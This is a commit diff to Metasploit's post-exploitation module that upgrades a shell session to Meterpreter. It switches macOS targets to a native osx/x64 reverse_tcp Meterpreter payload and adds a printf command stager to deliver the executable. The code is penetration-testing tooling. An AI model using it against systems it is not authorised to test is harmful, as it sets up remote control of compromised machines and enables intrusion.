upgrade osx shells to osx meterpreter

MS-2855/keylogger-mettle-extension
Tim W 2018-02-21 02:54:38 +08:00
parent 36e8f7a2bc
commit f10d58bc2d
1 changed files with 16 additions and 10 deletions

View File

@ -81,8 +81,10 @@ class MetasploitModule < Msf::Post
psh_arch = 'x86'
vprint_status("Platform: Windows")
when 'osx'
platform = 'python'
payload_name = 'python/meterpreter/reverse_tcp'
platform = 'osx'
payload_name = 'osx/x64/meterpreter/reverse_tcp'
lplat = [Msf::Platform::OSX]
larch = [ARCH_X64]
vprint_status("Platform: OS X")
when 'solaris'
platform = 'python'
@ -99,8 +101,10 @@ class MetasploitModule < Msf::Post
larch = [ARCH_X86]
vprint_status("Platform: Linux")
elsif target_info =~ /darwin/i
platform = 'python'
payload_name = 'python/meterpreter/reverse_tcp'
platform = 'osx'
payload_name = 'osx/x64/meterpreter/reverse_tcp'
lplat = [Msf::Platform::OSX]
larch = [ARCH_X64]
vprint_status("Platform: OS X")
elsif cmd_exec('python -V 2>&1') =~ /Python (2|3)\.(\d)/
# Generic fallback for OSX, Solaris, Linux/ARM
@ -162,7 +166,7 @@ class MetasploitModule < Msf::Post
print_error('Powershell is not installed on the target.') if datastore['WIN_TRANSFER'] == 'POWERSHELL'
vprint_status("Transfer method: VBS [fallback]")
exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data)
aborted = transmit_payload(exe)
aborted = transmit_payload(exe, platform)
end
end
when 'python'
@ -171,7 +175,7 @@ class MetasploitModule < Msf::Post
else
vprint_status("Transfer method: Bourne shell [fallback]")
exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data)
aborted = transmit_payload(exe)
aborted = transmit_payload(exe, platform)
end
if datastore['HANDLER']
@ -181,7 +185,7 @@ class MetasploitModule < Msf::Post
return nil
end
def transmit_payload(exe)
def transmit_payload(exe, platform)
#
# Generate the stager command array
#
@ -193,16 +197,18 @@ class MetasploitModule < Msf::Post
:linemax => linemax,
#:nodelete => true # keep temp files (for debugging)
}
if session.platform == 'windows'
case platform
when 'windows'
opts[:decoder] = File.join(Rex::Exploitation::DATA_DIR, "exploits", "cmdstager", 'vbs_b64')
cmdstager = Rex::Exploitation::CmdStagerVBS.new(exe)
when 'osx'
opts[:background] = true
cmdstager = Rex::Exploitation::CmdStagerPrintf.new(exe)
else
opts[:background] = true
opts[:temp] = datastore['BOURNE_PATH']
opts[:file] = datastore['BOURNE_FILE']
cmdstager = Rex::Exploitation::CmdStagerBourne.new(exe)
# Note: if a OS X binary payload is added in the future, use CmdStagerPrintf
# as /bin/sh on OS X doesn't support the -n option on echo
end
cmds = cmdstager.generate(opts)